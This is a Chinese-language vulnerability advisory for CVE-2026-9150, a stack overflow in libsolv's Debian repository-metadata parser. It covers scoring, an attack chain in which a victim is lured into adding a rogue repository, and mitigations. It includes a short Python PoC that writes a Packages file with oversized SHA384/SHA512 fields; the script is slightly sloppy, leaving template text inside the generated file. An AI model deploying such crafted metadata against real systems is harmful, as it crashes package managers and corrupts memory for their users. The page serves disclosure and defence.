CVE-2026-9150 CVSS 6.5 中危

CVE-2026-9150 libsolv堆栈溢出漏洞

披露日期: 2026-05-20

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-9150

漏洞类型

缓冲区溢出

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

libsolv

漏洞概述

libsolv库存在安全漏洞，其Debian元数据解析器在处理包含恶意SHA384或SHA512校验和标签的特制仓库元数据时，会发生基于堆栈的缓冲区溢出。攻击者可利用此缺陷导致内存损坏，进而引发受影响系统的拒绝服务。该漏洞攻击复杂度低，无需认证，但需要一定程度的用户交互才能触发。

技术细节

该漏洞位于libsolv的Debian元数据解析模块中。当解析器处理仓库元数据中的SHA384或SHA512校验和字段时，未对输入字符串的长度进行严格的边界检查。攻击者可以构建包含超长校验和值的恶意Debian仓库元数据文件。当受害系统使用libsolv组件（例如通过包管理器工具）解析此文件时，超长数据会被写入栈上的固定大小缓冲区，导致堆栈溢出。这会覆盖相邻的内存区域，破坏程序的执行流或关键数据，最终导致程序崩溃或系统拒绝服务。虽然主要影响为可用性，但在特定环境下内存损坏可能带来更严重的安全风险。

攻击链分析

STEP 1

制作恶意元数据

攻击者创建包含超长SHA384或SHA512校验和标签的特制Debian仓库元数据文件。

STEP 2

诱导访问

攻击者诱导受害者将包含恶意元数据的仓库地址添加到系统的软件源列表中。

STEP 3

触发解析

受害者系统更新软件包列表，包管理器调用libsolv库下载并解析恶意元数据。

STEP 4

执行攻击

libsolv解析器处理超长校验和时触发堆栈缓冲区溢出，导致内存损坏和程序崩溃（DoS）。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import os

# Simulate creating a malicious Debian metadata file with oversized checksum tags
malicious_metadata = """
Package: fake-package
Version: 1.0.0
Filename: pool/main/f/fake-package.deb
SHA384: {} + 'A'*500 # Excessive length to trigger overflow
SHA512: {} + 'B'*500 # Excessive length to trigger overflow
""".format('A'*500, 'B'*500)

with open('malicious_Packages', 'w') as f:
    f.write(malicious_metadata)

print("Malicious metadata file generated.")
# In a real scenario, this file would be hosted on a repository parsed by libsolv.

影响范围

libsolv < 修复版本

防御指南

临时缓解措施

建议用户暂时避免使用不可信的第三方软件源，并在官方补丁发布前，限制包管理器对非受信任仓库的访问权限。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-9150
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-9150
3 Details https://www.cvedetails.com/cve/CVE-2026-9150/
4 VulDB https://vuldb.com/cve/CVE-2026-9150
5 Link https://access.redhat.com/security/cve/CVE-2026-9150
6 Link https://bugzilla.redhat.com/show_bug.cgi?id=2460379
7 Link https://github.com/openSUSE/libsolv/pull/616

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表